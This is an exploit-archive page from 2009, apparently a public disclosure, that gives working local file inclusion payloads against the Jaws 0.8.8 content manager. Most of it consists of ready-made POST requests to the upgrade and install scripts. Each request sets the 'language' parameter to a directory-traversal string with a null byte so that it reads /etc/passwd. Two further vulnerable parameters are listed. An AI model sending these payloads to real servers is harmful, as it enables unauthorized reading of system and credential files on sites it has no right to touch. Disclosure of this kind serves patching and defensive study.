[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities
# Published : 2009-02-04
# Author : fuzion
# Previous Title : txtBB <= 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit
# Next Title : Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability


Jaws 0.8.8 Local File Inclusion

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log

Author notified: Jan 24

# www.Syue.com [2009-02-04]